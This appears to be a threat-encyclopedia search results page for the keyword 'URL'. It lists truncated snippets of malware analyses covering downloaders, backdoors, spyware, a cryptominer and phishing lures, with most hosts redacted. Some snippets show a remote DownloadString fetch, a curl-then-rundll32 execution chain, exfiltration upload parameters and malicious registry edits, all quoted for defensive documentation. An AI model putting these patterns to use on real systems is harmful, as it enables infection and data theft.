Keyword: URL
→ attribute set to hidden It connects to a URL to download malicious files: {BLOCKED}.{BLOCKED}.{BLOCKED}.237/gsgqmjivmr → saved as C:/kady/temp_AutoHotkey.exe {BLOCKED}.{BLOCKED}.{BLOCKED}.237/rjlcmdey → saved
URL using the curl command, then execute it using rundll32.exe with "scab /k besogon728" as arguments. Other Details However, as of this writing, the said sites are inaccessible. It requires being
uploaded. -u https://www.{BLOCKED}as.com/upload : Specifies the URL to which the file will be uploaded. -a : enables the append mode. -b 5000 : Sets the buffer size to 5000 bytes -z : Enables Compression -d :
URL = "1" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Search SearchAssistant = "about:blank" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\New Windows PopupMgr = "no
exposure of the user's account information, which may then lead to the unauthorized use of the stolen data. NOTES: It may connect to a remote URL to download its configuration file. The said file contains
monitors text boxes in the webpages displayed in Internet Explorer. It accesses the following URL to get the URL to access to display advertisements: http://search.{BLOCKED}ther.com/support/keyInfo.asp
accesses the URL https://{BLOCKED}y.com/124pr4 using the default browser. However, the said URL is inaccessible as of this writing. Modifies HOSTS file, Connects to URLs/IPs
).DownloadString(\\\"http://t.{BLOCKED}2.com/ipc.jsp?h\\\")'' Uses the following URL to get the public IP address: https://api.ipify.org/ It will scan the range of IP addresses available on the machine. If it
http://symbisecure.com/adserv/get.php NOTES: This backdoor connects to the following URL to read a part of its code and execute it in memory: http://{BLOCKED}r.no-ip.org/adserv/logo.jpg It only connects to the mentioned URL when it
Card Exfiltration Interval Malware Update Interval Logs URL of Malware for updating URL of other malware to be downloaded and executed As of this writing, the said servers are currently inaccessible.
from the connection is another URL. The malware connects to the received URL where it sends the stolen system information. The URL response is a binary executable file which is downloaded and executed as
executed from the websites, it attempts to connect to the URL https://twitter.com/hashtag/{BLOCKED}?f=tweets&vertical=default&src=tren to obtain a backup URL. If it obtains a backup URL, it saves the
the following parameters: -a, --algo=ALGO specifies the algorithm to use cryptonight cryptonight-lite cryptonight-heavy -o, --url=URL URL of mining server -O, --userpass=U:P username:password pair for
information by clicking on a URL that points to a fake Intuit website and entering it there. In other instances, clicking on the link in the spammed message leads users to a site similar to the one below:
}g.co.kr/images/korea/d.jpg NOTES: The dropped malware file songsariup.exe connects to the above mentioned URL address to download another malware. Once executed, the downloaded file creates the following folders: %Application
\SYSTEM\ControlSet001\ Services\BITS URL = "http://{BLOCKED}.129.230:801/12345.txt" Other Details This Trojan connects to the following possibly malicious URL: http://{BLOCKED}.129.230:801/12345.txt It
the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system. It downloads a possibly malicious file from a certain URL. The URL where this malware
\Windows.) It adds the following registry entries: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ Services\BITS URL = "http://{BLOCKED}.197.146:12345/1.txt" Dropping Routine This Trojan drops the following files:
\ Windows\CurrentVersion\URL SystemMgr = "Del" Other Details This spyware connects to the following possibly malicious URL: http://www.{BLOCKED}r.com/3/m.rar This report is generated via an automated analysis